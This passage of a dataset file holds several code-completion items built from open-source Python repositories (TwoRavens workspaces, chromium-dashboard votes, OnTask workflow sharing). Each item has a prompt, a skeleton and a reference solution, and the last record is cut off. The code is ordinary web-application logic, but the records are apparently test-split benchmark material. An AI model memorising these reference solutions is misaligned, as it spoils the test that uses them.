kwargs.get('data_source_type_id')\n self.workspace_id = kwargs.get('workspace_id')\n<|end_body_0|>\n\n<|body_start_1|>\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.list_workspaces_by_user(user_or_err, as_dict, **kwargs)\n<|end_body_1|>\n\n<|body_start_2|>\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n session_key = kwargs.get(KW_SESSION_KEY, None)\n ws_list = workspace_queryset_base().filter(user=auth_user)\n if not as_dict:\n return (True, ws_list)\n fmt_list = []\n for workspace in ws_list:\n ws_dict = workspace.as_dict_lite()\n ws_dict['is_current_session'] = bool(session_key and session_key == workspace.session_key)\n fmt_list.append(ws_dict)\n return (True, fmt_list)\n<|end_body_2|>\n\n<|body_start_3|>\n if ws_id is None:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n if request is None:\n return (False, ERR_REQUEST_OBJ_IS_NONE)\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.get_by_user_and_id(user_or_err, ws_id, as_dict)\n<|end_body_3|>\n\n<|body_start_4|>\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n if not ws_id:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n qparams = dict(id=ws_id)\n if auth_user.is_active and auth_user.is_superuser:\n workspace = workspace_queryset_base().filter(**qparams).first()\n else:\n qparams['user'] = auth_user\n workspace = workspace_queryset_base().filter(**qparams).first()\n if workspace:\n if as_dict:\n return (True, workspace.as_dict())\n return (True, workspace)\n return (False, 'Workspace not found with user: [%s] and id: [%s]' % (auth_user, ws_id))\n<|end_body_4|>\n", "class_docstring": "Convenience class for retrieving SavedWorkspace objects", "class_name": "WorkspaceRetriever", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass WorkspaceRetriever:\n 
\"\"\"Convenience class for retrieving SavedWorkspace objects\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id\"\"\"\n <|body_0|>\n\n def list_workspaces_by_request(request, as_dict=False, **kwargs):\n \"\"\"Retrieve a list of all workspaces\"\"\"\n <|body_1|>\n\n def list_workspaces_by_user(auth_user, as_dict=False, **kwargs):\n \"\"\"Retrieve a of workspaces for a user\"\"\"\n <|body_2|>\n\n def get_by_id_and_request(ws_id, request, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n <|body_3|>\n\n def get_by_user_and_id(auth_user, ws_id, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.app_domain = kwargs.get('app_domain')\n self.session_key = kwargs.get('session_key')\n self.user = kwargs.get('user')\n self.data_source_type_id = kwargs.get('data_source_type_id')\n self.workspace_id = kwargs.get('workspace_id')\n<|end_body_0|>\n\n<|body_start_1|>\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.list_workspaces_by_user(user_or_err, as_dict, **kwargs)\n<|end_body_1|>\n\n<|body_start_2|>\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n session_key = kwargs.get(KW_SESSION_KEY, None)\n ws_list = workspace_queryset_base().filter(user=auth_user)\n if not as_dict:\n return (True, ws_list)\n fmt_list = []\n for workspace in ws_list:\n ws_dict = workspace.as_dict_lite()\n ws_dict['is_current_session'] = bool(session_key and session_key == workspace.session_key)\n fmt_list.append(ws_dict)\n return (True, fmt_list)\n<|end_body_2|>\n\n<|body_start_3|>\n if ws_id is None:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n if request is None:\n return (False, ERR_REQUEST_OBJ_IS_NONE)\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.get_by_user_and_id(user_or_err, ws_id, as_dict)\n<|end_body_3|>\n\n<|body_start_4|>\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n if not ws_id:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n qparams = dict(id=ws_id)\n if auth_user.is_active and auth_user.is_superuser:\n workspace = workspace_queryset_base().filter(**qparams).first()\n else:\n qparams['user'] = auth_user\n workspace = workspace_queryset_base().filter(**qparams).first()\n if workspace:\n if as_dict:\n return (True, workspace.as_dict())\n return (True, workspace)\n return (False, 'Workspace not found with user: [%s] and id: [%s]' % (auth_user, ws_id))\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000391", "length_bytes": 4984, "license_type": "permissive", "methods": [{"docstring": "Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id", "name": "__init__", "signature": "def __init__(self, **kwargs)"}, {"docstring": "Retrieve a list of all workspaces", "name": "list_workspaces_by_request", "signature": "def list_workspaces_by_request(request, as_dict=False, **kwargs)"}, {"docstring": "Retrieve a of workspaces for a user", "name": 
"list_workspaces_by_user", "signature": "def list_workspaces_by_user(auth_user, as_dict=False, **kwargs)"}, {"docstring": "Get SavedWorkspace by id", "name": "get_by_id_and_request", "signature": "def get_by_id_and_request(ws_id, request, as_dict=False)"}, {"docstring": "Get SavedWorkspace by id", "name": "get_by_user_and_id", "signature": "def get_by_user_and_id(auth_user, ws_id, as_dict=False)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_001335", "prompt": "Implement the Python class `WorkspaceRetriever` described below.\n\nClass description:\nConvenience class for retrieving SavedWorkspace objects\n\nMethod signatures and docstrings:\n- def __init__(self, **kwargs): Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id\n- def list_workspaces_by_request(request, as_dict=False, **kwargs): Retrieve a list of all workspaces\n- def list_workspaces_by_user(auth_user, as_dict=False, **kwargs): Retrieve a of workspaces for a user\n- def get_by_id_and_request(ws_id, request, as_dict=False): Get SavedWorkspace by id\n- def get_by_user_and_id(auth_user, ws_id, as_dict=False): Get SavedWorkspace by id", "prompted_full_text": "Implement the Python class `WorkspaceRetriever` described below.\n\nClass description:\nConvenience class for retrieving SavedWorkspace objects\n\nMethod signatures and docstrings:\n- def __init__(self, **kwargs): Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id\n- def list_workspaces_by_request(request, as_dict=False, **kwargs): Retrieve a list of all workspaces\n- def list_workspaces_by_user(auth_user, as_dict=False, **kwargs): Retrieve a of workspaces for a user\n- def get_by_id_and_request(ws_id, request, as_dict=False): Get SavedWorkspace by id\n- def get_by_user_and_id(auth_user, ws_id, as_dict=False): Get SavedWorkspace by id\n\n<|skeleton|>\nclass WorkspaceRetriever:\n \"\"\"Convenience class for retrieving SavedWorkspace objects\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id\"\"\"\n <|body_0|>\n\n def list_workspaces_by_request(request, as_dict=False, **kwargs):\n \"\"\"Retrieve a list of all workspaces\"\"\"\n <|body_1|>\n\n def list_workspaces_by_user(auth_user, as_dict=False, **kwargs):\n \"\"\"Retrieve a of workspaces for a user\"\"\"\n <|body_2|>\n\n def get_by_id_and_request(ws_id, request, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n <|body_3|>\n\n def get_by_user_and_id(auth_user, ws_id, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.app_domain = kwargs.get('app_domain')\n self.session_key = kwargs.get('session_key')\n self.user = kwargs.get('user')\n self.data_source_type_id = kwargs.get('data_source_type_id')\n self.workspace_id = kwargs.get('workspace_id')\n<|end_body_0|>\n\n<|body_start_1|>\n success, user_or_err = 
get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.list_workspaces_by_user(user_or_err, as_dict, **kwargs)\n<|end_body_1|>\n\n<|body_start_2|>\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n session_key = kwargs.get(KW_SESSION_KEY, None)\n ws_list = workspace_queryset_base().filter(user=auth_user)\n if not as_dict:\n return (True, ws_list)\n fmt_list = []\n for workspace in ws_list:\n ws_dict = workspace.as_dict_lite()\n ws_dict['is_current_session'] = bool(session_key and session_key == workspace.session_key)\n fmt_list.append(ws_dict)\n return (True, fmt_list)\n<|end_body_2|>\n\n<|body_start_3|>\n if ws_id is None:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n if request is None:\n return (False, ERR_REQUEST_OBJ_IS_NONE)\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.get_by_user_and_id(user_or_err, ws_id, as_dict)\n<|end_body_3|>\n\n<|body_start_4|>\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n if not ws_id:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n qparams = dict(id=ws_id)\n if auth_user.is_active and auth_user.is_superuser:\n workspace = workspace_queryset_base().filter(**qparams).first()\n else:\n qparams['user'] = auth_user\n workspace = workspace_queryset_base().filter(**qparams).first()\n if workspace:\n if as_dict:\n return (True, workspace.as_dict())\n return (True, workspace)\n return (False, 'Workspace not found with user: [%s] and id: [%s]' % (auth_user, ws_id))\n<|end_body_4|>\n", "revision_id": "f84751b33fde26cd379d8120b3c6a6b5ed2c315d", "skeleton": "<|skeleton|>\nclass WorkspaceRetriever:\n \"\"\"Convenience class for retrieving SavedWorkspace objects\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id\"\"\"\n <|body_0|>\n\n def list_workspaces_by_request(request, as_dict=False, **kwargs):\n \"\"\"Retrieve a list of all workspaces\"\"\"\n <|body_1|>\n\n def list_workspaces_by_user(auth_user, as_dict=False, **kwargs):\n \"\"\"Retrieve a of workspaces for a user\"\"\"\n <|body_2|>\n\n def get_by_id_and_request(ws_id, request, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n <|body_3|>\n\n def get_by_user_and_id(auth_user, ws_id, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class WorkspaceRetriever:\n \"\"\"Convenience class for retrieving SavedWorkspace objects\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id\"\"\"\n self.app_domain = kwargs.get('app_domain')\n self.session_key = kwargs.get('session_key')\n self.user = kwargs.get('user')\n self.data_source_type_id = kwargs.get('data_source_type_id')\n self.workspace_id = kwargs.get('workspace_id')\n\n def list_workspaces_by_request(request, as_dict=False, **kwargs):\n \"\"\"Retrieve a list of all workspaces\"\"\"\n success, user_or_err = 
get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.list_workspaces_by_user(user_or_err, as_dict, **kwargs)\n\n def list_workspaces_by_user(auth_user, as_dict=False, **kwargs):\n \"\"\"Retrieve a of workspaces for a user\"\"\"\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n session_key = kwargs.get(KW_SESSION_KEY, None)\n ws_list = workspace_queryset_base().filter(user=auth_user)\n if not as_dict:\n return (True, ws_list)\n fmt_list = []\n for workspace in ws_list:\n ws_dict = workspace.as_dict_lite()\n ws_dict['is_current_session'] = bool(session_key and session_key == workspace.session_key)\n fmt_list.append(ws_dict)\n return (True, fmt_list)\n\n def get_by_id_and_request(ws_id, request, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n if ws_id is None:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n if request is None:\n return (False, ERR_REQUEST_OBJ_IS_NONE)\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.get_by_user_and_id(user_or_err, ws_id, as_dict)\n\n def get_by_user_and_id(auth_user, ws_id, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n if not ws_id:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n qparams = dict(id=ws_id)\n if auth_user.is_active and auth_user.is_superuser:\n workspace = workspace_queryset_base().filter(**qparams).first()\n else:\n qparams['user'] = auth_user\n workspace = workspace_queryset_base().filter(**qparams).first()\n if workspace:\n if as_dict:\n return (True, workspace.as_dict())\n return (True, workspace)\n return (False, 'Workspace not found with user: [%s] and id: [%s]' % (auth_user, ws_id))\n", "source": "the_stack_v2_python_sparse", "source_path": "tworaven_apps/workspaces/workspace_retriever.py", "source_repo": "Mital188/TwoRavens", "split": "test", "star_events_count": 0} {"blob_id": "406e66a7dbdee8a5ac1b6aafa6a3a0fcc4ad9750", "bodies": ["feature_id = kwargs['feature_id']\ngate_id = kwargs.get('gate_id', None)\nvotes = Vote.get_votes(feature_id=feature_id, gate_id=gate_id)\ndicts = [converters.vote_value_to_json_dict(v) for v in votes]\nreturn {'votes': dicts}", "feature_id = kwargs['feature_id']\ngate_id = kwargs['gate_id']\nfeature = self.get_specified_feature(feature_id=feature_id)\nnew_state = self.get_int_param('state', validator=Vote.is_valid_state)\nuser = self.get_current_user(required=True)\ngate = Gate.get_by_id(gate_id)\nif not gate:\n self.abort(404, msg='Gate not found')\nif gate.feature_id != feature_id:\n self.abort(400, msg='Mismatched feature and gate')\nold_state = gate.state\nself.require_permissions(user, feature, gate, new_state)\napproval_defs.set_vote(feature_id, None, new_state, user.email(), gate_id)\nif new_state == Vote.REVIEW_REQUESTED:\n notifier_helpers.notify_approvers_of_reviews(feature, gate)\nelse:\n notifier_helpers.notify_subscribers_of_vote_changes(feature, gate, user.email(), new_state, old_state)\nreturn {'message': 'Done'}", "is_requesting_review = new_state == Vote.REVIEW_REQUESTED\nis_editor = permissions.can_edit_feature(user, feature.key.integer_id())\napprovers = approval_defs.get_approvers(gate.gate_type)\nis_approver = permissions.can_approve_feature(user, feature, approvers)\nif is_requesting_review and is_editor:\n return\nif is_approver:\n return\nif is_requesting_review:\n self.abort(403, msg='User may not request a review')\nelse:\n self.abort(403, msg='User is not an 
approver')"], "bodies_text": "<|body_start_0|>\n feature_id = kwargs['feature_id']\n gate_id = kwargs.get('gate_id', None)\n votes = Vote.get_votes(feature_id=feature_id, gate_id=gate_id)\n dicts = [converters.vote_value_to_json_dict(v) for v in votes]\n return {'votes': dicts}\n<|end_body_0|>\n\n<|body_start_1|>\n feature_id = kwargs['feature_id']\n gate_id = kwargs['gate_id']\n feature = self.get_specified_feature(feature_id=feature_id)\n new_state = self.get_int_param('state', validator=Vote.is_valid_state)\n user = self.get_current_user(required=True)\n gate = Gate.get_by_id(gate_id)\n if not gate:\n self.abort(404, msg='Gate not found')\n if gate.feature_id != feature_id:\n self.abort(400, msg='Mismatched feature and gate')\n old_state = gate.state\n self.require_permissions(user, feature, gate, new_state)\n approval_defs.set_vote(feature_id, None, new_state, user.email(), gate_id)\n if new_state == Vote.REVIEW_REQUESTED:\n notifier_helpers.notify_approvers_of_reviews(feature, gate)\n else:\n notifier_helpers.notify_subscribers_of_vote_changes(feature, gate, user.email(), new_state, old_state)\n return {'message': 'Done'}\n<|end_body_1|>\n\n<|body_start_2|>\n is_requesting_review = new_state == Vote.REVIEW_REQUESTED\n is_editor = permissions.can_edit_feature(user, feature.key.integer_id())\n approvers = approval_defs.get_approvers(gate.gate_type)\n is_approver = permissions.can_approve_feature(user, feature, approvers)\n if is_requesting_review and is_editor:\n return\n if is_approver:\n return\n if is_requesting_review:\n self.abort(403, msg='User may not request a review')\n else:\n self.abort(403, msg='User is not an approver')\n<|end_body_2|>\n", "class_docstring": "Users may see the set of votes on a feature, and add their own, if allowed.", "class_name": "VotesAPI", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VotesAPI:\n \"\"\"Users may see the set of votes on a feature, and add their own, if allowed.\"\"\"\n\n def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]:\n \"\"\"Return a list of all vote values for a given feature.\"\"\"\n <|body_0|>\n\n def do_post(self, **kwargs) -> dict[str, str]:\n \"\"\"Set a user's vote value for the specified feature and gate.\"\"\"\n <|body_1|>\n\n def require_permissions(self, user, feature, gate, new_state):\n \"\"\"Abort the request if the user lacks permission to set this vote.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n feature_id = kwargs['feature_id']\n gate_id = kwargs.get('gate_id', None)\n votes = Vote.get_votes(feature_id=feature_id, gate_id=gate_id)\n dicts = [converters.vote_value_to_json_dict(v) for v in votes]\n return {'votes': dicts}\n<|end_body_0|>\n\n<|body_start_1|>\n feature_id = kwargs['feature_id']\n gate_id = kwargs['gate_id']\n feature = self.get_specified_feature(feature_id=feature_id)\n new_state = self.get_int_param('state', validator=Vote.is_valid_state)\n user = self.get_current_user(required=True)\n gate = Gate.get_by_id(gate_id)\n if not gate:\n self.abort(404, msg='Gate not found')\n if gate.feature_id != feature_id:\n self.abort(400, msg='Mismatched feature and gate')\n old_state = gate.state\n self.require_permissions(user, feature, gate, new_state)\n approval_defs.set_vote(feature_id, None, new_state, user.email(), gate_id)\n if new_state == Vote.REVIEW_REQUESTED:\n notifier_helpers.notify_approvers_of_reviews(feature, gate)\n else:\n notifier_helpers.notify_subscribers_of_vote_changes(feature, gate, 
user.email(), new_state, old_state)\n return {'message': 'Done'}\n<|end_body_1|>\n\n<|body_start_2|>\n is_requesting_review = new_state == Vote.REVIEW_REQUESTED\n is_editor = permissions.can_edit_feature(user, feature.key.integer_id())\n approvers = approval_defs.get_approvers(gate.gate_type)\n is_approver = permissions.can_approve_feature(user, feature, approvers)\n if is_requesting_review and is_editor:\n return\n if is_approver:\n return\n if is_requesting_review:\n self.abort(403, msg='User may not request a review')\n else:\n self.abort(403, msg='User is not an approver')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000392", "length_bytes": 4047, "license_type": "permissive", "methods": [{"docstring": "Return a list of all vote values for a given feature.", "name": "do_get", "signature": "def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]"}, {"docstring": "Set a user's vote value for the specified feature and gate.", "name": "do_post", "signature": "def do_post(self, **kwargs) -> dict[str, str]"}, {"docstring": "Abort the request if the user lacks permission to set this vote.", "name": "require_permissions", "signature": "def require_permissions(self, user, feature, gate, new_state)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005461", "prompt": "Implement the Python class `VotesAPI` described below.\n\nClass description:\nUsers may see the set of votes on a feature, and add their own, if allowed.\n\nMethod signatures and docstrings:\n- def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]: Return a list of all vote values for a given feature.\n- def do_post(self, **kwargs) -> dict[str, str]: Set a user's vote value for the specified feature and gate.\n- def require_permissions(self, user, feature, gate, new_state): Abort the request if the user lacks permission to set this vote.", "prompted_full_text": "Implement the Python class `VotesAPI` described below.\n\nClass description:\nUsers may see the set of votes on a feature, and add their own, if allowed.\n\nMethod signatures and docstrings:\n- def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]: Return a list of all vote values for a given feature.\n- def do_post(self, **kwargs) -> dict[str, str]: Set a user's vote value for the specified feature and gate.\n- def require_permissions(self, user, feature, gate, new_state): Abort the request if the user lacks permission to set this vote.\n\n<|skeleton|>\nclass VotesAPI:\n \"\"\"Users may see the set of votes on a feature, and add their own, if allowed.\"\"\"\n\n def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]:\n \"\"\"Return a list of all vote values for a given feature.\"\"\"\n <|body_0|>\n\n def do_post(self, **kwargs) -> dict[str, str]:\n \"\"\"Set a user's vote value for the specified feature and gate.\"\"\"\n <|body_1|>\n\n def require_permissions(self, user, feature, gate, new_state):\n \"\"\"Abort the request if the user lacks permission to set this vote.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n feature_id = kwargs['feature_id']\n gate_id = kwargs.get('gate_id', None)\n votes = Vote.get_votes(feature_id=feature_id, gate_id=gate_id)\n dicts = [converters.vote_value_to_json_dict(v) for v in votes]\n return {'votes': dicts}\n<|end_body_0|>\n\n<|body_start_1|>\n feature_id = kwargs['feature_id']\n gate_id = kwargs['gate_id']\n feature = self.get_specified_feature(feature_id=feature_id)\n new_state = self.get_int_param('state', validator=Vote.is_valid_state)\n user = 
self.get_current_user(required=True)\n gate = Gate.get_by_id(gate_id)\n if not gate:\n self.abort(404, msg='Gate not found')\n if gate.feature_id != feature_id:\n self.abort(400, msg='Mismatched feature and gate')\n old_state = gate.state\n self.require_permissions(user, feature, gate, new_state)\n approval_defs.set_vote(feature_id, None, new_state, user.email(), gate_id)\n if new_state == Vote.REVIEW_REQUESTED:\n notifier_helpers.notify_approvers_of_reviews(feature, gate)\n else:\n notifier_helpers.notify_subscribers_of_vote_changes(feature, gate, user.email(), new_state, old_state)\n return {'message': 'Done'}\n<|end_body_1|>\n\n<|body_start_2|>\n is_requesting_review = new_state == Vote.REVIEW_REQUESTED\n is_editor = permissions.can_edit_feature(user, feature.key.integer_id())\n approvers = approval_defs.get_approvers(gate.gate_type)\n is_approver = permissions.can_approve_feature(user, feature, approvers)\n if is_requesting_review and is_editor:\n return\n if is_approver:\n return\n if is_requesting_review:\n self.abort(403, msg='User may not request a review')\n else:\n self.abort(403, msg='User is not an approver')\n<|end_body_2|>\n", "revision_id": "17f9886d064da5bda84006d5866077727646fff2", "skeleton": "<|skeleton|>\nclass VotesAPI:\n \"\"\"Users may see the set of votes on a feature, and add their own, if allowed.\"\"\"\n\n def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]:\n \"\"\"Return a list of all vote values for a given feature.\"\"\"\n <|body_0|>\n\n def do_post(self, **kwargs) -> dict[str, str]:\n \"\"\"Set a user's vote value for the specified feature and gate.\"\"\"\n <|body_1|>\n\n def require_permissions(self, user, feature, gate, new_state):\n \"\"\"Abort the request if the user lacks permission to set this vote.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class VotesAPI:\n \"\"\"Users may see the set of votes on a feature, and add their own, if allowed.\"\"\"\n\n def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]:\n \"\"\"Return a list of all vote values for a given feature.\"\"\"\n feature_id = kwargs['feature_id']\n gate_id = kwargs.get('gate_id', None)\n votes = Vote.get_votes(feature_id=feature_id, gate_id=gate_id)\n dicts = [converters.vote_value_to_json_dict(v) for v in votes]\n return {'votes': dicts}\n\n def do_post(self, **kwargs) -> dict[str, str]:\n \"\"\"Set a user's vote value for the specified feature and gate.\"\"\"\n feature_id = kwargs['feature_id']\n gate_id = kwargs['gate_id']\n feature = self.get_specified_feature(feature_id=feature_id)\n new_state = self.get_int_param('state', validator=Vote.is_valid_state)\n user = self.get_current_user(required=True)\n gate = Gate.get_by_id(gate_id)\n if not gate:\n self.abort(404, msg='Gate not found')\n if gate.feature_id != feature_id:\n self.abort(400, msg='Mismatched feature and gate')\n old_state = gate.state\n self.require_permissions(user, feature, gate, new_state)\n approval_defs.set_vote(feature_id, None, new_state, user.email(), gate_id)\n if new_state == Vote.REVIEW_REQUESTED:\n notifier_helpers.notify_approvers_of_reviews(feature, gate)\n else:\n notifier_helpers.notify_subscribers_of_vote_changes(feature, gate, user.email(), new_state, old_state)\n return {'message': 'Done'}\n\n def require_permissions(self, user, feature, gate, new_state):\n \"\"\"Abort the request if the user lacks permission to set this vote.\"\"\"\n is_requesting_review = new_state == 
Vote.REVIEW_REQUESTED\n is_editor = permissions.can_edit_feature(user, feature.key.integer_id())\n approvers = approval_defs.get_approvers(gate.gate_type)\n is_approver = permissions.can_approve_feature(user, feature, approvers)\n if is_requesting_review and is_editor:\n return\n if is_approver:\n return\n if is_requesting_review:\n self.abort(403, msg='User may not request a review')\n else:\n self.abort(403, msg='User is not an approver')\n", "source": "the_stack_v2_python_sparse", "source_path": "api/reviews_api.py", "source_repo": "GoogleChrome/chromium-dashboard", "split": "test", "star_events_count": 574} {"blob_id": "64e15fa9ce188436ace05bcf08ff0538a4dc409f", "bodies": ["form_kwargs = super().get_form_kwargs()\nform_kwargs['workflow'] = self.workflow\nform_kwargs['user'] = self.request.user\nreturn form_kwargs", "self.workflow.shared.add(form.user_obj)\nself.workflow.save()\nself.workflow.log(self.request.user, models.Log.WORKFLOW_SHARE_ADD, share_email=form.user_obj.email)\nreturn http.JsonResponse({'html_redirect': ''})"], "bodies_text": "<|body_start_0|>\n form_kwargs = super().get_form_kwargs()\n form_kwargs['workflow'] = self.workflow\n form_kwargs['user'] = self.request.user\n return form_kwargs\n<|end_body_0|>\n\n<|body_start_1|>\n self.workflow.shared.add(form.user_obj)\n self.workflow.save()\n self.workflow.log(self.request.user, models.Log.WORKFLOW_SHARE_ADD, share_email=form.user_obj.email)\n return http.JsonResponse({'html_redirect': ''})\n<|end_body_1|>\n", "class_docstring": "View to create a new \"share\" user in the workflow.", "class_name": "WorkflowShareCreateView", "detected_licenses": ["LGPL-2.0-or-later", "BSD-3-Clause", "MIT", "Apache-2.0", "LGPL-2.1-only", "Python-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass WorkflowShareCreateView:\n \"\"\"View to create a new \"share\" user in the workflow.\"\"\"\n\n def get_form_kwargs(self) -> Dict:\n \"\"\"Store workflow and 'request.user' in kwargs\"\"\"\n <|body_0|>\n\n def form_valid(self, form) -> http.JsonResponse:\n \"\"\"Store the new shared user\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form_kwargs = super().get_form_kwargs()\n form_kwargs['workflow'] = self.workflow\n form_kwargs['user'] = self.request.user\n return form_kwargs\n<|end_body_0|>\n\n<|body_start_1|>\n self.workflow.shared.add(form.user_obj)\n self.workflow.save()\n self.workflow.log(self.request.user, models.Log.WORKFLOW_SHARE_ADD, share_email=form.user_obj.email)\n return http.JsonResponse({'html_redirect': ''})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000393", "length_bytes": 2685, "license_type": "permissive", "methods": [{"docstring": "Store workflow and 'request.user' in kwargs", "name": "get_form_kwargs", "signature": "def get_form_kwargs(self) -> Dict"}, {"docstring": "Store the new shared user", "name": "form_valid", "signature": "def form_valid(self, form) -> http.JsonResponse"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002463", "prompt": "Implement the Python class `WorkflowShareCreateView` described below.\n\nClass description:\nView to create a new \"share\" user in the workflow.\n\nMethod signatures and docstrings:\n- def get_form_kwargs(self) -> Dict: Store workflow and 'request.user' in kwargs\n- def form_valid(self, form) -> http.JsonResponse: Store the new shared user", "prompted_full_text": "Implement the Python class `WorkflowShareCreateView` described below.\n\nClass description:\nView to create a new \"share\" user 
in the workflow.\n\nMethod signatures and docstrings:\n- def get_form_kwargs(self) -> Dict: Store workflow and 'request.user' in kwargs\n- def form_valid(self, form) -> http.JsonResponse: Store the new shared user\n\n<|skeleton|>\nclass WorkflowShareCreateView:\n \"\"\"View to create a new \"share\" user in the workflow.\"\"\"\n\n def get_form_kwargs(self) -> Dict:\n \"\"\"Store workflow and 'request.user' in kwargs\"\"\"\n <|body_0|>\n\n def form_valid(self, form) -> http.JsonResponse:\n \"\"\"Store the new shared user\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form_kwargs = super().get_form_kwargs()\n form_kwargs['workflow'] = self.workflow\n form_kwargs['user'] = self.request.user\n return form_kwargs\n<|end_body_0|>\n\n<|body_start_1|>\n self.workflow.shared.add(form.user_obj)\n self.workflow.save()\n self.workflow.log(self.request.user, models.Log.WORKFLOW_SHARE_ADD, share_email=form.user_obj.email)\n return http.JsonResponse({'html_redirect': ''})\n<|end_body_1|>\n", "revision_id": "c432745dfff932cbe7397100422d49df78f0a882", "skeleton": "<|skeleton|>\nclass WorkflowShareCreateView:\n \"\"\"View to create a new \"share\" user in the workflow.\"\"\"\n\n def get_form_kwargs(self) -> Dict:\n \"\"\"Store workflow and 'request.user' in kwargs\"\"\"\n <|body_0|>\n\n def form_valid(self, form) -> http.JsonResponse:\n \"\"\"Store the new shared user\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class WorkflowShareCreateView:\n \"\"\"View to create a new \"share\" user in the workflow.\"\"\"\n\n def get_form_kwargs(self) -> Dict:\n \"\"\"Store workflow and 'request.user' in kwargs\"\"\"\n 